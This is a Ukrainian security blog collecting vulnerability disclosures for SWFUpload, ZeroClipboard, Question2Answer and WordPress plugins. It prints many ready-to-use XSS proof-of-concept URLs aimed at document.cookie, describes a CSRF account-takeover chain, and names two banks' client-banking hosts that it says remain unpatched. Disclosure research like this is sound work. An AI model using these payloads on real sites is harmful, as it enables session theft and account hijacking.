Websecurity - Веб безпека

У листопаді, 10.11.2012, я виявив Content Spoofing та Cross-Site Scripting уразливості в SWFUpload. Про що вже повідомив розробникам.

Торік я писав про XSS уразливість в swfupload в WordPress та в багатьох інших веб додатках. І це нові дірки в SWFUpload. Це дуже популярна флешка, що використовується на десятках мільйонів сайтів та в сотнях веб додатків (таких як WordPress, лише один цей веб додаток використовується більше ніж на 62 мільйонах сайтів за даними wordpress.com).

Є декілька імен файлів SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf і swfupload_f11.swf. Всі вони вразливі, за виключенням swfupload.swf, що постачається з WordPress починаючи з версії 3.3.2.

Content Spoofing (WASC-12):

http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

Cross-Site Scripting (WASC-08):

http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Код виконається після кліку. Це strictly social XSS.

Вразливі всі версії SWFUpload - SWFUpload v2.2.0.1 та попередні версії. Та вразливі всі веб додатки, що використовують дані версії SWFUpload. Для виправлення уразливості потрібно використати swfupload.swf з WordPress 3.3.2 та наступних версій (в цій флешці були виправлені як попередня XSS, так і ці CS та XSS уразливості).

P.S.

Як я вияснив, дані CS та XSS уразливості були виправлені не в WordPress 3.3.2, а в WordPress 3.5.1. Тому версії 3.3.2 - 3.5 все ще вразливі, а в версії 3.5.1 вони включили оновлену версію SWFUpload, без згадки про це виправлення, лише згадали про це в версії 3.5.2.

29.11.2012

У жовтні, 21.10.2012, я виявив Abuse of Functionality, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в Question2Answer. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в Question2Answer.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

01.03.2013

Abuse of Functionality (WASC-42):

http://site/login
http://site/forgot
http://site/reset

Можливий підбір логіна/емайла (вони обидва можуть використовуватися для аутентифікації). При відсутності такого логіна/емайла, система відповідає “User not found”.

http://site/account

Можливий підбір логіна/емайла (вони обидва можуть використовуватися для аутентифікації). Якщо є такий логін, система відповідає “This username is used”. Якщо є такий емайл, система відповідає “This e-mail is used”.

Insufficient Anti-automation (WASC-21):

http://site/login
http://site/forgot
http://site/reset

На даних сторінках немає захисту від автоматизованих запитів. Що дозволяє автоматизувати Abuse of Functionality атаки.

http://site/account

Це внутрішня сторінка. Тому для автоматизації підбору логінів або емайлів спочатку потрібно зайти в акаунт. В зв’язку з відсутністю капчі в логін формі, про що я писав в попередньому записі, можливий автоматизований логін. Тому перший POST запит відправляється до http://site/login для входу, а наступні POST запити відправляються до http://site/account для підбору логінів/емайлів.

Cross-Site Request Forgery (WASC-09):

Можна захопити акаунт користувача (в тому числі адмінський акаунт) відправивши CSRF запит до http://site/account. Після відправлення запиту даним експлоітом для зміни емайла, нападнику потрібно відновити пароль на свій емайл через функцію відновлення (http://site/reset).

Експлоіт:

Question2Answer CSRF.html

Комплексний експлоіт:

Question2Answer Exploit.txt

Уразливі всі версії Question2Answer (перевірялася версія 1.5.3). Як повідомив мені розробник, в версії Q2A 1.6 він планує додати захист від CSRF (і в січні він додав цей захист в останню dev-версію Q2A). В Question2Answer є ще багато інших уразливостей, на що я звернув увагу розробника.

В даній добірці уразливості в веб додатках:

• Arbitrary File Upload Vulnerability in Sitecom Home Storage Center (деталі)
• jQuery vulnerability (деталі)
• Command Injection Vulnerability in Sitecom Home Storage Center (деталі)
• rails security update (деталі)
• Forescout NAC (Network Access Control) multiple vulnerabilities (деталі)
• I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution (деталі)
• Forescout NAC multiple vulnerabilities (деталі)
• PHP-Fusion 7.02.05 SQL Injection (деталі)
• Heap-based buffer underflow in libxml2, as used in Google Chrome (деталі)
• SQLi found in Kodak Insite (деталі)

27.11.2012

У жовтні, 21.10.2012, я виявив Brute Force, Insufficient Anti-automation та Cross-Site Request Forgery уразливості в Question2Answer. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

28.02.2013

Brute Force (WASC-11):

В логін формі (http://site/login) немає захисту від BF атак.

Експлоіт:

Question2Answer BF.html

Insufficient Anti-automation (WASC-21):

На сторінці контактів (http://site/feedback) немає захисту від автоматизованих атак.

Експлоіт:

Question2Answer IAA.html

Cross-Site Request Forgery (WASC-09):

Немає захисту від CSRF атак в функціоналі логіна (http://site/login) і логаута (http://site/logout), та на інших сторінках (взагалі в системі відсутній такий захист). В наступному адвізорі я приведу приклад CSRF, що дозволяє захопити адмінський акаунт.

Відсутність капчі в формі логіна призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта), вищенаведений Brute Force та інші автоматизовані атаки.

Уразливі всі версії Question2Answer (перевірялася версія 1.5.3). Як повідомив мені розробник, в версії Q2A 1.6 він планує додати захист від CSRF (і в січні він додав цей захист в останню dev-версію Q2A).

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wysija Newsletters, Google Document Embedder та Gallery. Для котрих з’явилися експлоіти. Wysija Newsletters - це плагін для відправки інформаційних листів, Google Document Embedder - це плагін для включення в сайт документів з сервісів Гугла, Gallery - це плагін для створення галерей зображень.

• SQL Injection Vulnerability in Wysija Newsletters WordPress Plugin (деталі)
• WordPress Google Document Embedder Arbitrary File Disclosure (деталі)
• WordPress Gallery 3.8.3 Arbitrary File Read (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

14.07.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://jsbni.kiev.ua - сайті банка “Національні інвестиції” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про peb.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка “Національні інвестиції”. Всього 109 уразливостей в системи IFOBS.

https://cbserver.jsbni.kiev.ua:7002/ifobsClient/

Дані уразливості досі не виправлені.

Після мого попереднього списку вразливих програм з ZeroClipboard.swf, у лютому, 20.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard10.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них em-shorty, RepRapCalculator, Fulcrum, Django і aCMS. Та існує багато інших уразливих веб додатків з ZeroClipboard10.swf (деякі з них також містять ZeroClipboard.swf).

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в першому записі).

em-shorty:

http://site/public/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

RepRapCalculator:

http://site/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Fulcrum:

http://site/admin/lib/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/admin/lib/zeroclipboard/zeroclipboard/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Django (різні веб додатки на Django фреймворку):

Django 1.3.1:

http://site/media/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/media/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Djangoplicity:

http://site/static/djangoplicity/js/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/static/js/ZeroClipboard10.swfZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

aCMS:

http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Окрім ZeroClipboard, в aCMS також є Cumulus (tagcloud.swf), уразливості в якому я оприлюднив (і частина з них була виправлена) ще в 2009 році.

http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Вразливі наступні веб додатки з флешкою: em-shorty 0.5.0 та попередні версії, RepRapCalculator, Fulcrum - всі версії даної CMS, Django - є багато веб сайтів на Django framework (зокрема Django 1.3.1 та Djangoplicity) з ZeroClipboard, aCMS 1.0.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPressSearch, XML Sitemap Generator та NextGEN Gallery. Для котрих з’явилися експлоіти. WordPressSearch - це плагін для пошуку нерухомості, XML Sitemap Generator - це плагін для створення xml-файлів карти сайту, NextGEN Gallery - це плагін для створення галерей зображень.

• WordPressSearch plugin SQL Injection Vulnerability (деталі)
• XML Sitemap Generator 3.2.8 Code Injection (деталі)
• WordPress NextGEN Gallery 1.9.10 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

30.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://peb.com.ua - сайті банка “Промэкономбанк” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про energobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

23.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка Промекономбанк. Всього 109 уразливостей в системи IFOBS.

https://ibank.peb.com.ua:7002

Дані уразливості досі не виправлені.

У лютому, 17.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них YAML, Multiproject для Trac, UserCollections для Piwigo, TAO і TableTools для DataTables для jQuery. Та існує багато інших уразливих веб додатків з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

YAML:

http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Multiproject extension for Trac:

http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height 

UserCollections extension for Piwigo:

http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TAO:

http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TableTools plugin for DataTables plugin for jQuery:

http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

InfoGlue:

http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

OGDI Field for Drupal:

http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Вразливі наступні веб додатки з флешкою: YAML 4.0.2 та попередні версії, Multiproject 1.4.21 та попередні версії, UserCollections для Piwigo, TAO 2.3.1 та попередні версії, TableTools для DataTables для jQuery. Зокрема він постачається з InfoGlue 2.1 (та попередніми версіями) та OGDI Field 6.x-1.0 (та попередніми версіями) для Drupal.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.